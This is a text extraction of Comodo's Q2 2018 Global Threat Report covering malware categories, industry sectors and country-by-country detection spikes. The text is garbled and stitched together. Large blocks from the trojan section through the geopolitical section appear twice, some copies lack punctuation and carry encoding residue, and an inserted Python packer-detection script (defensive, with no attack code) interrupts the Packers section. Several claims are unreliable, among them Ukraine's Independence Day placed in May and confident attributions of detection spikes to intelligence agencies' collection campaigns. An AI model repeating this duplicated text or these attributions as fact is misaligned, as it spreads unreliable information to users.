Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries

This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May

Global Threat Report Q2 2018 Edition

Page 49 of 73

523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware

In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo

The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections

And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018

Global Threat Report Q2 2018 Edition

Page 50 of 73

524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)

The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges

Global Threat Report Q2 2018 Edition

Page 51 of 73

53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers

Global Threat Report Q2 2018 Edition

Page 52 of 73

531 Constructor Constructors are applications that can be used to automatically create malware files

For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users

In Q2 Germany (de) was the top country of detection for Constructors

And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks

Global Threat Report Q2 2018 Edition

Page 53 of 73

5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables,” dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
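As an added example (not code from the report or from the UPX project), a heuristic that flags packed PE files the way the paragraph describes them: it reads only the section table, checks for section names a packer leaves behind, and measures the Shannon entropy of each section, since compressed or encrypted code is close to random. The packer name list, the threshold and the two sample images are constructed for this example; the entropy check is the signal that survives a modified packer renaming its sections.

```python
"""Heuristic detector for packed PE executables (added example, not Comodo code).

A packer (UPX and its modified variants included) stores the real program as a
compressed blob plus a small decompression stub. Two cheap signals expose that:
section names a known packer leaves behind, and the near-random byte
distribution (Shannon entropy close to 8 bits/byte) of compressed or
encrypted data. Only the section table is parsed, so no PE library is needed.
"""
import math
import random
import struct
from collections import Counter

# Section names left by well-known packers; this list is the example's assumption.
KNOWN_PACKER_SECTIONS = {b"UPX0", b"UPX1", b"UPX2", b".upx", b"MPRESS1", b".aspack"}
ENTROPY_THRESHOLD = 7.0  # bits/byte; ordinary x86 code usually scores around 5 to 6.5


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for constant or empty input, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk the COFF section table; returns [(name, virtual_size, raw_bytes), ...]."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, vsize, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess(pe: bytes) -> dict:
    """Return the per-section findings and an overall likely_packed verdict."""
    findings, strong = [], False
    for name, vsize, raw in parse_sections(pe):
        label = name.decode("ascii", errors="replace")
        ent = shannon_entropy(raw)
        if name in KNOWN_PACKER_SECTIONS:
            findings.append(f"{label}: known packer section name")
            strong = True
        if ent >= ENTROPY_THRESHOLD:
            findings.append(f"{label}: entropy {ent:.2f} looks compressed or encrypted")
            strong = True
        if not raw and vsize >= 0x1000:
            # Empty on disk, large in memory: the usual unpacking destination.
            # Weak on its own (.bss looks the same), so it only supports the verdict.
            findings.append(f"{label}: empty on disk but {vsize:#x} bytes in memory")
    return {"findings": findings, "likely_packed": strong}


def build_sample_pe(sections) -> bytes:
    """Constructed minimal image: DOS header, PE signature, COFF header, no optional
    header (a loader would reject it, but the section table is laid out exactly as
    in a real file), then one 40-byte header per (name, virtual_size, raw) entry."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    headers_end = 64 + 4 + 20 + 40 * len(sections)
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF                  # 512-byte file alignment
    table, blobs, vaddr = b"", b"", 0x1000
    for name, vsize, raw in sections:
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, len(raw), raw_ptr if raw else 0,
            0, 0, 0, 0, 0x60000020)
        blobs += raw
        raw_ptr += len(raw)
        vaddr += (max(vsize, len(raw)) + 0xFFF) & ~0xFFF
    image = bytes(dos) + b"PE\0\0" + coff + table
    return image + b"\0" * (((headers_end + 0x1FF) & ~0x1FF) - headers_end) + blobs


_rng = random.Random(2018)
# Constructed samples: a "packed" one with UPX-style sections and a random blob
# standing in for compressed code, and a plain one with ordinary code-like bytes.
PACKED_SAMPLE = build_sample_pe([
    (b"UPX0", 0x10000, b""),
    (b"UPX1", 0x1000, bytes(_rng.getrandbits(8) for _ in range(4096))),
])
CLEAN_SAMPLE = build_sample_pe([
    (b".text", 0x1000, b"\x55\x8b\xec\x90" * 300 + b"\xc3"),
    (b".data", 0x1000, b"constructed sample string\0" * 50),
])

if __name__ == "__main__":
    for label, sample in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, assess(sample))
```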

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information but merely to have fun at the victim’s expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application,” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and “system optimizers.”

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let’s examine unique malware profiles that Comodo identified within specific “verticals,” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot,” which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free.” Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news,” Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility.”


7.10 Finland, Russia, USA

Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account.”

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial-of-service (DoS).

The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges

Global Threat Report Q2 2018 Edition

Page 51 of 73

53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers

Global Threat Report Q2 2018 Edition

Page 52 of 73

531 Constructor Constructors are applications that can be used to automatically create malware files

For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users

In Q2 Germany (de) was the top country of detection for Constructors

And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks

Global Threat Report Q2 2018 Edition

Page 53 of 73

532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack

MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length

In Q2 2018 Russia was the 1 home to malware Packers

This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes

Global Threat Report Q2 2018 Edition

Page 54 of 73

533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack

The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders

The primary country where Comodo detected this malicious behavior was in Germany

And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany

Global Threat Report Q2 2018 Edition

Page 55 of 73

534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018

Global Threat Report Q2 2018 Edition

Page 56 of 73

535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time

Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous ndash but still something to be aware of

Global Threat Report Q2 2018 Edition

Page 57 of 73

54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications

Global Threat Report Q2 2018 Edition

Page 58 of 73

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America

Global Threat Report Q2 2018 Edition

Page 59 of 73

542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more

The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo

As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018

And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US

Global Threat Report Q2 2018 Edition

Page 60 of 73

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US (and to a lesser extent Ukraine) has a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

